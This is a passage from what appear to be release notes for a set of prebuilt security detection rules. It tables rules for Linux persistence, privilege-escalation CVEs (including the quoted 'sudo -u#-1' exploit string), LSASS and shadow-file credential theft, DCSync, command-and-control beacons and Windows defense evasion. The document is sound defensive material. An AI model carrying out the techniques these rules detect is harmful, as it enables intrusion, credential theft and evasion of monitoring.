service unit files that run at boot. Adversaries may add or alter files located in the /etc/init.d/ directory to execute malicious code upon boot in order to gain persistence on the system. | update | 6 + +|<<prebuilt-rule-8-10-5-kernel-module-load-via-insmod, Kernel Module Load via insmod>> | Detects the use of the insmod binary to load a Linux kernel object file. Threat actors can use this binary, given they have root privileges, to load a rootkit on a system providing them with complete control and the ability to hide from security products. Manually loading a kernel module in this manner should not be at all common and can indicate suspcious or malicious behavior. | update | 106 + +|<<prebuilt-rule-8-10-5-persistence-via-kde-autostart-script-or-desktop-file-modification, Persistence via KDE AutoStart Script or Desktop File Modification>> | Identifies the creation or modification of a K Desktop Environment (KDE) AutoStart script or desktop file that will execute upon each user logon. Adversaries may abuse this method for persistence. | update | 107 + +|<<prebuilt-rule-8-10-5-potential-linux-backdoor-user-account-creation, Potential Linux Backdoor User Account Creation>> | Identifies the attempt to create a new backdoor user by setting the user's UID to 0. Attackers may alter a user's UID to 0 to establish persistence on a system. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-remote-code-execution-via-web-server, Potential Remote Code Execution via Web Server>> | Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. Attackers may exploit a vulnerability in a web application to execute commands via a web server, or place a backdoor file that can be abused to gain code execution as a mechanism for persistence. | update | 5 + +|<<prebuilt-rule-8-10-5-linux-user-added-to-privileged-group, Linux User Added to Privileged Group>> | Identifies attempts to add a user to a privileged group. Attackers may add users to a privileged group in order to establish persistence on a system. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-persistence-through-motd-file-creation-detected, Potential Persistence Through MOTD File Creation Detected>> | Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" and "/usr/lib/update-notifier/" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the creation of potentially malicious files within the default MOTD file directories. | update | 6 + +|<<prebuilt-rule-8-10-5-suspicious-process-spawned-from-motd-detected, Suspicious Process Spawned from MOTD Detected>> | Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" and "/usr/lib/update-notifier/" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the execution of potentially malicious processes through the MOTD utility. | update | 6 + +|<<prebuilt-rule-8-10-5-potential-persistence-through-run-control-detected, Potential Persistence Through Run Control Detected>> | This rule monitors the creation/alteration of the rc.local file by a previously unknown process executable through the use of the new terms rule type. The /etc/rc.local file is used to start custom applications, services, scripts or commands during start-up. The rc.local file has mostly been replaced by Systemd. However, through the "systemd-rc-local-generator", rc.local files can be converted to services that run at boot. Adversaries may alter rc.local to execute malicious code at start-up, and gain persistence onto the system. | update | 107 + +|<<prebuilt-rule-8-10-5-shared-object-created-or-changed-by-previously-unknown-process, Shared Object Created or Changed by Previously Unknown Process>> | This rule monitors the creation of shared object files by previously unknown processes. The creation of a shared object file involves compiling code into a dynamically linked library that can be loaded by other programs at runtime. While this process is typically used for legitimate purposes, malicious actors can leverage shared object files to execute unauthorized code, inject malicious functionality into legitimate processes, or bypass security controls. This allows malware to persist on the system, evade detection, and potentially compromise the integrity and confidentiality of the affected system and its data. | update | 4 + +|<<prebuilt-rule-8-10-5-new-systemd-timer-created, New Systemd Timer Created>> | Detects the creation of a systemd timer within any of the default systemd timer directories. Systemd timers can be used by an attacker to gain persistence, by scheduling the execution of a command or script. Similarly to cron/at, systemd timers can be set up to execute on boot time, or on a specific point in time, which allows attackers to regain access in case the connection to the infected asset was lost. | update | 6 + +|<<prebuilt-rule-8-10-5-new-systemd-service-created-by-previously-unknown-process, New Systemd Service Created by Previously Unknown Process>> | Systemd service files are configuration files in Linux systems used to define and manage system services. Malicious actors can leverage systemd service files to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection. | update | 5 + +|<<prebuilt-rule-8-10-5-potential-unauthorized-access-via-wildcard-injection-detected, Potential Unauthorized Access via Wildcard Injection Detected>> | This rule monitors for the execution of the "chown" and "chmod" commands with command line flags that could indicate a wildcard injection attack. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-via-container-misconfiguration, Potential Privilege Escalation via Container Misconfiguration>> | This rule monitors for the execution of processes that interact with Linux containers through an interactive shell without root permissions. Utilities such as runc and ctr are universal command-line utilities leveraged to interact with containers via root permissions. On systems where the access to these utilities are misconfigured, attackers might be able to create and run a container that mounts the root folder or spawn a privileged container vulnerable to a container escape attack, which might allow them to escalate privileges and gain further access onto the host file system. | update | 3 + +|<<prebuilt-rule-8-10-5-modification-of-dynamic-linker-preload-shared-object, Modification of Dynamic Linker Preload Shared Object>> | Identifies modification of the dynamic linker preload shared object (ld.so.preload). Adversaries may execute malicious payloads by hijacking the dynamic linker used to load libraries. | update | 207 + +|<<prebuilt-rule-8-10-5-suspicious-symbolic-link-created, Suspicious Symbolic Link Created>> | Identifies the creation of a symbolic link to a suspicious file or location. A symbolic link is a reference to a file or directory that acts as a pointer or shortcut, allowing users to access the target file or directory from a different location in the file system. An attacker can potentially leverage symbolic links for privilege escalation by tricking a privileged process into following the symbolic link to a sensitive file, giving the attacker access to data or capabilities they would not normally have. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-via-uid-int-max-bug-detected, Potential Privilege Escalation via UID INT_MAX Bug Detected>> | This rule monitors for the execution of the systemd-run command by a user with a UID that is larger than the maximum allowed UID size (INT_MAX). Some older Linux versions were affected by a bug which allows user accounts with a UID greater than INT_MAX to escalate privileges by spawning a shell through systemd-run. | update | 3 + +|<<prebuilt-rule-8-10-5-kernel-load-or-unload-via-kexec-detected, Kernel Load or Unload via Kexec Detected>> | This detection rule identifies the usage of kexec, helping to uncover unauthorized kernel replacements and potential compromise of the system's integrity. Kexec is a Linux feature that enables the loading and execution of a different kernel without going through the typical boot process. Malicious actors can abuse kexec to bypass security measures, escalate privileges, establish persistence or hide their activities by loading a malicious kernel, enabling them to tamper with the system's trusted state, allowing e.g. a VM Escape. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-via-cve-2023-4911, Potential Privilege Escalation via CVE-2023-4911>> | This rule detects potential privilege escalation attempts through Looney Tunables (CVE-2023-4911). Looney Tunables is a buffer overflow vulnerability in GNU C Library's dynamic loader's processing of the GLIBC_TUNABLES environment variable. | update | 2 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-via-overlayfs, Potential Privilege Escalation via OverlayFS>> | Identifies an attempt to exploit a local privilege escalation (CVE-2023-2640 and CVE-2023-32629) via a flaw in Ubuntu's modifications to OverlayFS. These flaws allow the creation of specialized executables, which, upon execution, grant the ability to escalate privileges to root on the affected machine. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-via-pkexec, Potential Privilege Escalation via PKEXEC>> | Identifies an attempt to exploit a local privilege escalation in polkit pkexec (CVE-2021-4034) via unsecure environment variable injection. Successful exploitation allows an unprivileged user to escalate to the root user. | update | 106 + +|<<prebuilt-rule-8-10-5-potential-shell-via-wildcard-injection-detected, Potential Shell via Wildcard Injection Detected>> | This rule monitors for the execution of a set of linux binaries, that are potentially vulnerable to wildcard injection, with suspicious command line flags followed by a shell spawn event. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-suspicious-debugfs-root-device-access, Potential Suspicious DebugFS Root Device Access>> | This rule monitors for the usage of the built-in Linux DebugFS utility to access a disk device without root permissions. Linux users that are part of the "disk" group have sufficient privileges to access all data inside of the machine through DebugFS. Attackers may leverage DebugFS in conjunction with "disk" permissions to read sensitive files owned by root, such as the shadow file, root ssh private keys or other sensitive files that may allow them to further escalate privileges. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-shadow-file-read-via-command-line-utilities, Potential Shadow File Read via Command Line Utilities>> | Identifies access to the /etc/shadow file via the commandline using standard system utilities. After elevating privileges to root, threat actors may attempt to read or dump this file in order to gain valid credentials. They may utilize these to move laterally undetected and access additional resources. | update | 107 + +|<<prebuilt-rule-8-10-5-potential-sudo-privilege-escalation-via-cve-2019-14287, Potential Sudo Privilege Escalation via CVE-2019-14287>> | This rule monitors for the execution of a suspicious sudo command that is leveraged in CVE-2019-14287 to escalate privileges to root. Sudo does not verify the presence of the designated user ID and proceeds to execute using a user ID that can be chosen arbitrarily. By using the sudo privileges, the command "sudo -u#-1" translates to an ID of 0, representing the root user. This exploit may work for sudo versions prior to v1.28. | update | 2 + +|<<prebuilt-rule-8-10-5-potential-sudo-hijacking-detected, Potential Sudo Hijacking Detected>> | Identifies the creation of a sudo binary located at /usr/bin/sudo. Attackers may hijack the default sudo binary and replace it with a custom binary or script that can read the user's password in clear text to escalate privileges or enable persistence onto the system every time the sudo binary is executed. | update | 103 + +|<<prebuilt-rule-8-10-5-potential-sudo-token-manipulation-via-process-injection, Potential Sudo Token Manipulation via Process Injection>> | This rule detects potential sudo token manipulation attacks through process injection by monitoring the use of a debugger (gdb) process followed by a successful uid change event during the execution of the sudo process. A sudo token manipulation attack is performed by injecting into a process that has a valid sudo token, which can then be used by attackers to activate their own sudo token. This attack requires ptrace to be enabled in conjunction with the existence of a living process that has a valid sudo token with the same uid as the current user. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-via-recently-compiled-executable, Potential Privilege Escalation via Recently Compiled Executable>> | This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent alteration of UID permissions to root privileges. This behavior can potentially indicate the execution of a kernel or software privilege escalation exploit. | update | 2 + +|<<prebuilt-rule-8-10-5-namespace-manipulation-using-unshare, Namespace Manipulation Using Unshare>> | Identifies suspicious usage of unshare to manipulate system namespaces. Unshare can be utilized to escalate privileges or escape container security boundaries. Threat actors have utilized this binary to allow themselves to escape to the host and access other resources or escalate privileges. | update | 7 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-through-writable-docker-socket, Potential Privilege Escalation through Writable Docker Socket>> | This rule monitors for the usage of Docker runtime sockets to escalate privileges on Linux systems. Docker sockets by default are only be writable by the root user and docker group. Attackers that have permissions to write to these sockets may be able to create and run a container that allows them to escalate privileges and gain further access onto the host file system. | update | 3 + +|<<prebuilt-rule-8-10-5-cobalt-strike-command-and-control-beacon, Cobalt Strike Command and Control Beacon>> | Cobalt Strike is a threat emulation platform commonly modified and used by adversaries to conduct network attack and exploitation campaigns. This rule detects a network activity algorithm leveraged by Cobalt Strike implant beacons for command and control. | update | 105 + +|<<prebuilt-rule-8-10-5-possible-fin7-dga-command-and-control-behavior, Possible FIN7 DGA Command and Control Behavior>> | This rule detects a known command and control pattern in network events. The FIN7 threat group is known to use this command and control technique, while maintaining persistence in their target's network. | update | 104 + +|<<prebuilt-rule-8-10-5-halfbaked-command-and-control-beacon, Halfbaked Command and Control Beacon>> | Halfbaked is a malware family used to establish persistence in a contested network. This rule detects a network activity algorithm leveraged by Halfbaked implant beacons for command and control. | update | 104 + +|<<prebuilt-rule-8-10-5-potential-network-sweep-detected, Potential Network Sweep Detected>> | This rule identifies a potential network sweep. A network sweep is a method used by attackers to scan a target network, identifying active hosts, open ports, and available services to gather information on vulnerabilities and weaknesses. This reconnaissance helps them plan subsequent attacks and exploit potential entry points for unauthorized access, data theft, or other malicious activities. This rule proposes threshold logic to check for connection attempts from one source host to 10 or more destination hosts on commonly used network services. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-network-scan-detected, Potential Network Scan Detected>> | This rule identifies a potential port scan. A port scan is a method utilized by attackers to systematically scan a target system or network for open ports, allowing them to identify available services and potential vulnerabilities. By mapping out the open ports, attackers can gather critical information to plan and execute targeted attacks, gaining unauthorized access, compromising security, and potentially leading to data breaches, unauthorized control, or further exploitation of the targeted system or network. This rule proposes threshold logic to check for connection attempts from one source host to 20 or more destination ports. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-syn-based-network-scan-detected, Potential SYN-Based Network Scan Detected>> | This rule identifies a potential SYN-Based port scan. A SYN port scan is a technique employed by attackers to scan a target network for open ports by sending SYN packets to multiple ports and observing the response. Attackers use this method to identify potential entry points or services that may be vulnerable to exploitation, allowing them to launch targeted attacks or gain unauthorized access to the system or network, compromising its security and potentially leading to data breaches or further malicious activities. This rule proposes threshold logic to check for connection attempts from one source host to 10 or more destination ports using 2 or less packets per port. | update | 4 + +|<<prebuilt-rule-8-10-5-inbound-connection-to-an-unsecure-elasticsearch-node, Inbound Connection to an Unsecure Elasticsearch Node>> | Identifies Elasticsearch nodes that do not have Transport Layer Security (TLS), and/or lack authentication, and are accepting inbound network connections over the default Elasticsearch port. | update | 104 + +|<<prebuilt-rule-8-10-5-exporting-exchange-mailbox-via-powershell, Exporting Exchange Mailbox via PowerShell>> | Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. | update | 108 + +|<<prebuilt-rule-8-10-5-exchange-mailbox-export-via-powershell, Exchange Mailbox Export via PowerShell>> | Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. | update | 6 + +|<<prebuilt-rule-8-10-5-powershell-suspicious-script-with-audio-capture-capabilities, PowerShell Suspicious Script with Audio Capture Capabilities>> | Detects PowerShell scripts that can record audio, a common feature in popular post-exploitation tooling. | update | 108 + +|<<prebuilt-rule-8-10-5-powershell-keylogging-script, PowerShell Keylogging Script>> | Detects the use of Win32 API Functions that can be used to capture user keystrokes in PowerShell scripts. Attackers use this technique to capture user input, looking for credentials and/or other valuable data. | update | 110 + +|<<prebuilt-rule-8-10-5-encrypting-files-with-winrar-or-7z, Encrypting Files with WinRar or 7z>> | Identifies use of WinRar or 7z to create an encrypted files. Adversaries will often compress and encrypt data in preparation for exfiltration. | update | 108 + +|<<prebuilt-rule-8-10-5-potential-file-transfer-via-certreq, Potential File Transfer via Certreq>> | Identifies Certreq making an HTTP Post request. Adversaries could abuse Certreq to download files or upload data to a remote URL. | update | 5 + +|<<prebuilt-rule-8-10-5-connection-to-commonly-abused-web-services, Connection to Commonly Abused Web Services>> | Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. | update | 108 + +|<<prebuilt-rule-8-10-5-potential-dns-tunneling-via-nslookup, Potential DNS Tunneling via NsLookup>> | This rule identifies a large number (15) of nslookup.exe executions with an explicit query type from the same host. This may indicate command and control activity utilizing the DNS protocol. | update | 107 + +|<<prebuilt-rule-8-10-5-port-forwarding-rule-addition, Port Forwarding Rule Addition>> | Identifies the creation of a new port forwarding rule. An adversary may abuse this technique to bypass network segmentation restrictions. | update | 107 + +|<<prebuilt-rule-8-10-5-potential-remote-desktop-tunneling-detected, Potential Remote Desktop Tunneling Detected>> | Identifies potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. | update | 107 + +|<<prebuilt-rule-8-10-5-remote-file-download-via-script-interpreter, Remote File Download via Script Interpreter>> | Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination. | update | 108 + +|<<prebuilt-rule-8-10-5-potential-credential-access-via-windows-utilities, Potential Credential Access via Windows Utilities>> | Identifies the execution of known Windows utilities often abused to dump LSASS memory or the Active Directory database (NTDS.dit) in preparation for credential access. | update | 109 + +|<<prebuilt-rule-8-10-5-ntds-or-sam-database-file-copied, NTDS or SAM Database File Copied>> | Identifies a copy operation of the Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files. Those files contain sensitive information including hashed domain and/or local credentials. | update | 107 + +|<<prebuilt-rule-8-10-5-potential-credential-access-via-trusted-developer-utility, Potential Credential Access via Trusted Developer Utility>> | An instance of MSBuild, the Microsoft Build Engine, loaded DLLs (dynamically linked libraries) responsible for Windows credential management. This technique is sometimes used for credential dumping. | update | 108 + +|<<prebuilt-rule-8-10-5-firsttime-seen-account-performing-dcsync, FirstTime Seen Account Performing DCSync>> | This rule identifies when a User Account starts the Active Directory Replication Process for the first time. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. | update | 7 + +|<<prebuilt-rule-8-10-5-potential-credential-access-via-dcsync, Potential Credential Access via DCSync>> | This rule identifies when a User Account starts the Active Directory Replication Process. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. | update | 110 + +|<<prebuilt-rule-8-10-5-kerberos-pre-authentication-disabled-for-user, Kerberos Pre-authentication Disabled for User>> | Identifies the modification of an account's Kerberos pre-authentication options. An adversary with GenericWrite/GenericAll rights over the account can maliciously modify these settings to perform offline password cracking attacks such as AS-REP roasting. | update | 108 + +|<<prebuilt-rule-8-10-5-access-to-a-sensitive-ldap-attribute, Access to a Sensitive LDAP Attribute>> | Identify access to sensitive Active Directory object attributes that contains credentials and decryption keys such as unixUserPassword, ms-PKI-AccountCredentials and msPKI-CredentialRoamingTokens. | update | 8 + +|<<prebuilt-rule-8-10-5-lsass-process-access-via-windows-api, LSASS Process Access via Windows API>> | Identifies access attempts to the LSASS handle, which may indicate an attempt to dump credentials from LSASS memory. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-local-ntlm-relay-via-http, Potential Local NTLM Relay via HTTP>> | Identifies attempt to coerce a local NTLM authentication via HTTP using the Windows Printer Spooler service as a target. An adversary may use this primitive in combination with other techniques to elevate privileges on a compromised system. | update | 107 + +|<<prebuilt-rule-8-10-5-sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user, Sensitive Privilege SeEnableDelegationPrivilege assigned to a User>> | Identifies the assignment of the SeEnableDelegationPrivilege sensitive "user right" to a user. The SeEnableDelegationPrivilege "user right" enables computer and user accounts to be trusted for delegation. Attackers can abuse this right to compromise Active Directory accounts and elevate their privileges. | update | 108 + +|<<prebuilt-rule-8-10-5-potential-credential-access-via-renamed-com-services-dll, Potential Credential Access via Renamed COM+ Services DLL>> | Identifies suspicious renamed COMSVCS.DLL Image Load, which exports the MiniDump function that can be used to dump a process memory. This may indicate an attempt to dump LSASS memory while bypassing command-line based detection in preparation for credential access. | update | 105 + +|<<prebuilt-rule-8-10-5-potential-credential-access-via-lsass-memory-dump, Potential Credential Access via LSASS Memory Dump>> | Identifies suspicious access to LSASS handle from a call trace pointing to DBGHelp.dll or DBGCore.dll, which both export the MiniDumpWriteDump method that can be used to dump LSASS memory content in preparation for credential access. | update | 207 + +|<<prebuilt-rule-8-10-5-suspicious-remote-registry-access-via-sebackupprivilege, Suspicious Remote Registry Access via SeBackupPrivilege>> | Identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation. | update | 108 + +|<<prebuilt-rule-8-10-5-symbolic-link-to-shadow-copy-created, Symbolic Link to Shadow Copy Created>> | Identifies the creation of symbolic links to a shadow copy. Symbolic links can be used to access files in the shadow copy, including sensitive files such as ntds.dit, System Boot Key and browser offline credentials. | update | 107 + +|<<prebuilt-rule-8-10-5-adding-hidden-file-attribute-via-attrib, Adding Hidden File Attribute via Attrib>> | Adversaries can add the 'hidden' attribute to files to hide them from the user in an attempt to evade detection. | update | 109 + +|<<prebuilt-rule-8-10-5-modification-of-amsienable-registry-key, Modification of AmsiEnable Registry Key>> | Identifies modifications of the AmsiEnable registry key to 0, which disables the Antimalware Scan Interface (AMSI). An adversary can modify this key to disable AMSI protections. | update | 107 + +|<<prebuilt-rule-8-10-5-clearing-windows-console-history, Clearing Windows Console History>> | Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. | update | 107 + +|<<prebuilt-rule-8-10-5-clearing-windows-event-logs, Clearing Windows Event Logs>> | Identifies attempts to clear or disable Windows event log stores using Windows wevetutil command. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system. | update | 108 + +|<<prebuilt-rule-8-10-5-code-signing-policy-modification-through-registry, Code Signing Policy Modification Through Registry>> | Identifies attempts to disable/modify the code signing policy through the registry. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code. | update | 6 + +|<<prebuilt-rule-8-10-5-windows-defender-disabled-via-registry-modification, Windows Defender Disabled via Registry Modification>> | Identifies modifications to the Windows Defender registry settings to disable the service or set the service to be started manually. | update | 107 + +|<<prebuilt-rule-8-10-5-powershell-script-block-logging-disabled, PowerShell Script Block Logging Disabled>> | Identifies attempts to disable PowerShell Script Block Logging via registry modification. Attackers may disable this logging to conceal their activities in the host and evade detection. | update | 107 + +|<<prebuilt-rule-8-10-5-disabling-windows-defender-security-settings-via-powershell, Disabling Windows Defender Security Settings via PowerShell>> | Identifies use of the Set-MpPreference PowerShell command to disable or weaken certain Windows Defender settings. | update | 107 + +|<<prebuilt-rule-8-10-5-disable-windows-event-and-security-logs-using-built-in-tools, Disable Windows Event and Security Logs Using Built-in Tools>> | Identifies attempts to disable EventLog via the logman Windows utility, PowerShell, or auditpol. This is often done by attackers in an attempt to evade detection on a system. | update | 108 + +|<<prebuilt-rule-8-10-5-dns-over-https-enabled-via-registry, DNS-over-HTTPS Enabled via Registry>> | Identifies when a user enables DNS-over-HTTPS. This can be used to hide internet activity or the process of exfiltrating data. With this enabled, an organization will lose visibility into data such as query type, response, and originating IP, which are used to determine bad actors. | update | 106 + +|<<prebuilt-rule-8-10-5-suspicious-net-code-compilation, Suspicious .NET Code Compilation>> | Identifies executions of .NET compilers with suspicious parent processes, which can indicate an attacker's attempt to compile code after delivery in order to bypass security mechanisms. | update | 107 + +|<<prebuilt-rule-8-10-5-microsoft-build-engine-started-by-a-script-process, Microsoft Build Engine Started by a Script Process>> | An instance of MSBuild, the Microsoft Build Engine, was started by a script or the Windows command interpreter. This behavior is unusual and is sometimes used by malicious payloads. | update | 206 + +|<<prebuilt-rule-8-10-5-microsoft-build-engine-using-an-alternate-name, Microsoft Build Engine Using an Alternate Name>> | An instance of MSBuild, the Microsoft Build Engine, was started after being renamed. This is uncommon behavior and may indicate an attempt to run unnoticed or undetected. | update | 109 + +|<<prebuilt-rule-8-10-5-microsoft-build-engine-started-an-unusual-process, Microsoft Build Engine Started an Unusual Process>> | An instance of MSBuild, the Microsoft Build Engine, started a PowerShell script or the Visual C# Command Line Compiler. This technique is sometimes used to deploy a malicious payload using the Build Engine. | update | 207 + +|<<prebuilt-rule-8-10-5-potential-dll-side-loading-via-trusted-microsoft-programs, Potential DLL Side-Loading via Trusted Microsoft Programs>> | Identifies an instance of a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side loading a malicious DLL within the memory space of one of those processes. | update | 107 + +|<<prebuilt-rule-8-10-5-process-injection-by-the-microsoft-build-engine, Process Injection by the Microsoft Build Engine>> | An instance of MSBuild, the Microsoft Build Engine, created a thread in another process. This technique is sometimes used to evade detection or elevate privileges. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-endpoint-security-parent-process, Suspicious Endpoint Security Parent Process>> | A suspicious Endpoint Security parent process was detected. This may indicate a process hollowing or other form of code injection. | update | 107 + +|<<prebuilt-rule-8-10-5-suspicious-werfault-child-process, Suspicious WerFault Child Process>> | A suspicious WerFault child process was detected, which may indicate an attempt to run via the SilentProcessExit registry key manipulation. Verify process details such as command line, network connections and file writes. | update | 108 + +|<<prebuilt-rule-8-10-5-potential-windows-error-manager-masquerading, Potential Windows Error Manager Masquerading>> | Identifies suspicious instances of the Windows Error Reporting process (WerFault.exe or Wermgr.exe) with matching command-line and process executable values performing outgoing network connections. This may be indicative of a masquerading attempt to evade suspicious child process behavior detections. | update | 106 + +|<<prebuilt-rule-8-10-5-microsoft-windows-defender-tampering, Microsoft Windows Defender Tampering>> | Identifies when one or more features on Microsoft Defender are disabled. Adversaries may disable or tamper with Microsoft Defender features to evade detection and conceal malicious behavior. | update | 107 + +|<<prebuilt-rule-8-10-5-network-connection-via-signed-binary, Network Connection via Signed Binary>> | Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Adversaries may use these binaries to 'live off the land' and execute malicious files that could bypass application allowlists and signature validation. | update | 106 + +|<<prebuilt-rule-8-10-5-unusual-network-activity-from-a-windows-system-binary, Unusual Network Activity from a Windows System Binary>> | Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection. | update | 108 + +|<<prebuilt-rule-8-10-5-parent-process-pid-spoofing, Parent Process PID Spoofing>> | Identifies parent process spoofing used to thwart detection. Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. | update | 105 + +|<<prebuilt-rule-8-10-5-local-account-tokenfilter-policy-disabled, Local Account TokenFilter Policy Disabled>> | Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. | update | 6 + +|<<prebuilt-rule-8-10-5-suspicious-net-reflection-via-powershell, Suspicious .NET Reflection via PowerShell>> | Detects the use of Reflection.Assembly to load PEs and DLLs in memory in PowerShell scripts. Attackers use this method to load executables and DLLs without writing to the disk, bypassing security solutions. | update | 109 + +|<<prebuilt-rule-8-10-5-potential-process-injection-via-powershell, Potential Process Injection via PowerShell>> | Detects the use of Windows API functions that are commonly abused by malware and security tools to load malicious code or inject it into remote processes. | update | 108 + +|<<prebuilt-rule-8-10-5-windows-firewall-disabled-via-powershell, Windows Firewall Disabled via PowerShell>> | Identifies when the Windows Firewall is disabled using PowerShell cmdlets, which can help attackers evade network constraints, like internet and network lateral communication restrictions. | update | 107 + +|<<prebuilt-rule-8-10-5-process-termination-followed-by-deletion, Process Termination followed by Deletion>> | Identifies a process termination event quickly followed by the deletion of its executable file. Malware tools and other non-native files dropped or created on a system by an adversary may leave traces to indicate to what occurred. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. | update | 107 + +|<<prebuilt-rule-8-10-5-scheduled-tasks-at-command-enabled, Scheduled Tasks AT Command Enabled>> | Identifies attempts to enable the Windows scheduled tasks AT command via the registry. Attackers may use this method to move laterally or persist locally. The AT command has been deprecated since Windows 8 and Windows Server 2012, but still exists for backwards compatibility. | update | 106 + +|<<prebuilt-rule-8-10-5-potential-secure-file-deletion-via-sdelete-utility, Potential Secure File Deletion via SDelete Utility>> | Detects file name patterns generated by the use of Sysinternals SDelete utility to securely delete a file via multiple file overwrite and rename operations. | update | 107 + +|<<prebuilt-rule-8-10-5-solarwinds-process-disabling-services-via-registry, SolarWinds Process Disabling Services via Registry>> | Identifies a SolarWinds binary modifying the start type of a service to be disabled. An adversary may abuse this technique to manipulate relevant security services. | update | 106 + +|<<prebuilt-rule-8-10-5-suspicious-execution-from-a-mounted-device, Suspicious Execution from a Mounted Device>> | Identifies when a script interpreter or signed binary is launched via a non-standard working directory. An attacker may use this technique to evade defenses. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-managed-code-hosting-process, Suspicious Managed Code Hosting Process>> | Identifies a suspicious managed code hosting process which could indicate code injection or other form of suspicious code execution. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-process-access-via-direct-system-call, Suspicious Process Access via Direct System Call>> | Identifies suspicious process access events from an unknown memory region. Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly. | update | 209 + +|<<prebuilt-rule-8-10-5-suspicious-script-object-execution, Suspicious Script Object Execution>> | Identifies scrobj.dll loaded into unusual Microsoft processes. This usually means a malicious scriptlet is being executed in the target process. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-wmic-xsl-script-execution, Suspicious WMIC XSL Script Execution>> | Identifies WMIC allowlist bypass techniques by alerting on suspicious execution of scripts. When WMIC loads scripting libraries it may be indicative of an allowlist bypass. | update | 106 + +|<<prebuilt-rule-8-10-5-suspicious-zoom-child-process, Suspicious Zoom Child Process>> | A suspicious Zoom child process was detected, which may indicate an attempt to run unnoticed. Verify process details such as command line, network connections, file writes and associated file signature details as well. | update | 108 + +|<<prebuilt-rule-8-10-5-unusual-executable-file-creation-by-a-system-critical-process, Unusual Executable File Creation by a System Critical Process>> | Identifies an unexpected executable file being created or modified by a Windows system critical process, which may indicate activity related to remote code execution or other forms of exploitation. | update | 108 + +|<<prebuilt-rule-8-10-5-unsigned-dll-side-loading-from-a-suspicious-folder, Unsigned DLL Side-Loading from a Suspicious Folder>> | Identifies a Windows trusted program running from locations often abused by adversaries to masquerade as a trusted program and loading a recently dropped DLL. This behavior may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of a signed processes. | update | 5 + +|<<prebuilt-rule-8-10-5-untrusted-driver-loaded, Untrusted Driver Loaded>> | Identifies attempt to load an untrusted driver. Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. | update | 6 + +|<<prebuilt-rule-8-10-5-adfind-command-activity, AdFind Command Activity>> | This rule detects the Active Directory query tool, AdFind.exe. AdFind 